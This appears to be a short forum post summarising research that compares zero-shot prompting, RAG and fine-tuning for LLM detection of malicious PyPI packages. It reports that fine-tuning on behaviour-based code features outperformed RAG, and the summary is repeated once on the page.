Can LLMs Detect Malicious PyPI Packages Better with RAG?
Over 1,200 malicious Python packages were evaluated using three approaches:
– Zero-shot LLM prompts (no prior examples)
– Retrieval-Augmented Generation (RAG) with threat intelligence
– Fine-tuned LLMs on labeled malicious behavior patterns
RAG underperformed across all tests—even when enhanced with YARA rules, GitHub Advisories, and known malware code snippets. It failed to meaningfully improve detection in any setup.
In contrast, fine-tuning LLaMA-3.1-8B on behavior-based features (e.g., os.system, subprocess.Popen, eval) reached 97% accuracy and 95% balanced accuracy, outperforming both zero-shot and RAG methods.
abhisek•4h ago
Over 1,200 malicious Python packages were evaluated using three approaches:
– Zero-shot LLM prompts (no prior examples)
– Retrieval-Augmented Generation (RAG) with threat intelligence
– Fine-tuned LLMs on labeled malicious behavior patterns
RAG underperformed across all tests—even when enhanced with YARA rules, GitHub Advisories, and known malware code snippets. It failed to meaningfully improve detection in any setup.
In contrast, fine-tuning LLaMA-3.1-8B on behavior-based features (e.g., os.system, subprocess.Popen, eval) reached 97% accuracy and 95% balanced accuracy, outperforming both zero-shot and RAG methods.